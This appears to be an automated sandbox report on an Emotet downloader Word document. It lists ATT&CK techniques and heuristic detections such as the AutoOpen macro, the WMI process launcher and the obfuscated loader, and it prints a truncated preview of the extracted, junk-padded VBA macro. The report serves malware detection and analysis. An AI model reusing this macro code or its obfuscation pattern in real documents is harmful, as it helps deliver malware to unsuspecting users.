Verdict: MALICIOUS
Risk Score: 382

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader that uses GetObject and CreateObject to launch a WMI process. This is characteristic of Emotet's downloader functionality, which typically fetches and executes a second-stage payload. The ClamAV signature also confirms this identification.
Heuristics (10)
- ClamAV: Doc.Downloader.Emotet-10001946-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected [medium, 6 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10281 bytes |

SHA-256 (macros.bas): 743a7e7dfda2a2565e8fdd26c867834f9c33c3ccf41cdf93f56e900b90fe151f
Script preview (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "j052640"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "n2581304, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b_0376, 1, 1, MSForms, TextBox"
Attribute VB_Control = "f616817, 2, 2, MSForms, TextBox"
Attribute VB_Control = "A64818, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c_0237_4, 4, 4, MSForms, TextBox"
Attribute VB_Control = "C_4934_0, 5, 5, MSForms, TextBox"
Attribute VB_Name = "u6446562"
Attribute VB_Name = "k6471_8"
Attribute VB_Name = "Y5513012"
Attribute VB_Name = "Q12543"
Attribute VB_Name = "k67426_"
Attribute VB_Name = "b001947"
Attribute VB_Name = "r3273_"
Function c1690793(h292409)
While C53_587 And D081842
CreateObject ("M950421")
CreateObject ("z5578801")
CreateObject ("231383114")
CreateObject ("213146393")
CreateObject ("f107038")
Wend
While P0_58471 And Q52906
CreateObject ("j25_87")
CreateObject ("I861_8")
CreateObject ("483619105")
CreateObject ("688624756")
CreateObject ("P0737212")
Wend
While j43773 And z818476_
CreateObject ("w7_369_0")
CreateObject ("z56819")
CreateObject ("706577816")
CreateObject ("343803285")
CreateObject ("P__5__95")
Wend
Set c1690793 = CVar(h292409)
While X2_54143 And v82302_
CreateObject ("b9020_5")
CreateObject ("v137156")
CreateObject ("560909251")
CreateObject ("777227899")
CreateObject ("o2667707")
Wend
While F83_70 And J07534
CreateObject ("M247284")
CreateObject ("C168_02_")
CreateObject ("5610351")
CreateObject ("963416791")
CreateObject ("I22682")
Wend
While q675499 And i083960
CreateObject ("D92722")
CreateObject ("U085700")
CreateObject ("510324829")
CreateObject ("550402930")
CreateObject ("i89530")
Wend
End Function
Sub _
_
_
autoopen()
On Error Resume Next
While f41960 And w03508
CreateObject ("I2731497")
CreateObject ("K9_908_")
CreateObject ("428548477")
CreateObject ("355109480")
CreateObject ("q6083913")
Wend
While S409_350 And p37303
CreateObject ("v88_801")
CreateObject ("J00123")
CreateObject ("857831959")
CreateObject ("592303265")
CreateObject ("J47206")
Wend
f36620
While q89012 And r5958_
CreateObject ("D_692484")
CreateObject ("k06017")
CreateObject ("677609100")
CreateObject ("931606268")
CreateObject ("i27826")
Wend
While z7611852 And t1014709
CreateObject ("E13633")
CreateObject ("M7_78_1")
CreateObject ("800206652")
CreateObject ("235991737")
CreateObject ("u_33526")
Wend
While S6627_2 And H002448
CreateObject ("l01278")
CreateObject ("Z3367643")
CreateObject ("150489629")
CreateObject ("789683960")
CreateObject ("Y3__8196")
Wend
End Sub
Attribute VB_Name = "T10276"
Function f36620()
On Error Resume Next
While A944561 And Z52565
CreateObject ("Y7427961")
CreateObject ("i5_617")
CreateObject ("510837001")
CreateObject ("217796745")
CreateObject ("U026_4_5")
Wend
While z8647351 And n21719
CreateObject ("w4765347")
CreateObject ("u2_19009")
CreateObject ("333769331")
CreateObject ("749270997")
CreateObject ("r46_2_")
Wend
While L02617 And j05392
... (truncated)
```